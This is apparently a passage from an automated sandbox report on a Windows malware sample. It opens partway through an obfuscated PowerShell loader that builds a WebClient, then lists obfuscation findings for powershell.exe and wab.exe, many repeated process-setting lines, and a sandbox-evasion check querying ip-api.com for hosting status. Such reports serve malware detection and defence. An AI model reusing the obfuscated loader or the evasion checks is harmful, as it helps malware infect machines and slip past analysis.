lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF886E40952 push E95B7BD0h; ret 3_2_00007FF886E409C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_07B70638 push eax; mov dword ptr [esp], ecx 9_2_07B70AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF8039 pushfd ; retn 0027h 12_2_02EF803A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF0CB5 push edi; ret 12_2_02EF0CC2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF0C93 push edi; retf 12_2_02EF0C3A
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
